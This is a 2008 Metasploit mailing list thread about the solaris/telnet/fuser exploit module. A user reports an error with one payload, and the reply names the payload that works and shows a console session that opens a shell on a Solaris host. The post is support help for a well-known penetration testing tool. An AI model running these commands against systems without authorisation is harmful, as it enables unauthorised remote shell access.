Metasploit mailing list archives
solaris/telnet/fuser
From: mc at metasploit.com (MC)
Date: Tue, 14 Oct 2008 18:04:08 -0400 (EDT)
hey josh! the only compatible payload is the 'cmd/unix/interact' msf exploit(fuser) > set PAYLOAD cmd/unix/interact PAYLOAD => cmd/unix/interact msf exploit(fuser) > exploit [*] Setting USER environment variable... [*] Found shell. [*] Command shell session 1 opened (x.x.x.x:49172 -> x.x.x.x:23) $ VdptAJHKiDCyEwGz $ uname -a uname -a SunOS sol-shiz 5.10 Generic_118855-33 i86pc i386 i86pc $ ..the same for the ttyprompt bug. On Tue, 14 Oct 2008, Joshua Smith wrote:
{HD, *}@metasploit.com, Amazing piece of code. I'm honestly in awe every time I use it. All, I apologize in advance if this ends up being a stupid question. Also, I'm lucky enough to know the author of this module so I put the question to him too, will let the list know if he comes up w/anything Question: root at laptop:~/framework-trunk# ./msfcli solaris/telnet/fuser RHOST=192.168.1.1 PAYLOAD=solaris/x86/shell_bind_tcp E [*] Started bind handler [*] Setting USER environment variable... [-] Exploit failed: undefined method `put' for nil:NilClass Not surprisingly I get the same thing w/the SPARC version Not important, but when I run ./msfcli solaris/telnet/fuser RHOST=192.168.1.1 P I get Compatible payloads =================== Name Description ---- ----------- and that's it. I'm running Ubuntu 8.04 Hardy Heron, kernel ver: 2.6.24-19, ruby 1.8.6, and I just ran an SVN update Any ideas? -Josh
-- ~ mc
Current thread:
- solaris/telnet/fuser Joshua Smith (Oct 14)
- solaris/telnet/fuser H D Moore (Oct 14)
- solaris/telnet/fuser MC (Oct 14)
- <Possible follow-ups>
- solaris/telnet/fuser Joshua Smith (Oct 14)